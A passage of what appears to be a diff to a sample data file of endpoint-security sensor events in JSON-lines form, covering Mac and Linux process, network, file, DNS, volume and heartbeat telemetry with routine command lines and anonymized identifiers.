a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"208.216.150.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} 
-{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"208.193.200.164","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"} -{"AgentLoadFlags":"0","AgentLocalTime":"1636436839.9529998","AgentTimeOffset":"125.319","AgentVersion":"6.31.14404.0","BiosManufacturer":"Apple Inc.","BiosVersion":"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)","ChassisType":"Laptop","City":"San Francisco","ComputerName":"mac1","ConfigBuild":"1007.4.0014404.1","ConfigIDBuild":"14404","Continent":"North America","Country":"United States","FalconGroupingTags":"-","FirstSeen":"1625682391.0","HostHiddenStatus":"Visible","MachineDomain":"none","OU":"none","PointerSize":"none","ProductType":"1","SensorGroupingTags":"-","ServicePackMajor":"none","SiteName":"none","SystemManufacturer":"Apple Inc.","SystemProductName":"MacBookPro16,2","Time":"1636448427.3539999","Timezone":"America/Los_Angeles","Version":"Big Sur (11.0)","aid":"fffffffffffaaaaaaaaabbbbbbbb","aip":"208.30.227.225","cid":"ffffffff30a3407dae27d0503611022ff","event_platform":"Mac"} \ No newline at end of file +{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"67.43.156.14","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s 
unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"67.43.156.14","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"67.43.156.14","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"67.43.156.14","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"67.43.156.14","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"67.43.156.14","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"67.43.156.13","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"} 
+{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"} +{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"67.43.156.14","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"} 
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"67.43.156.13","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"67.43.156.14","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMajor":"1","
VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"67.43.156.14","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"3967242894","aip":"67.43.156.13","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.14","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"} +{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"} +{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"67.43.156.13","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar 
Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"67.43.156.14","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"67.43.156.14","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 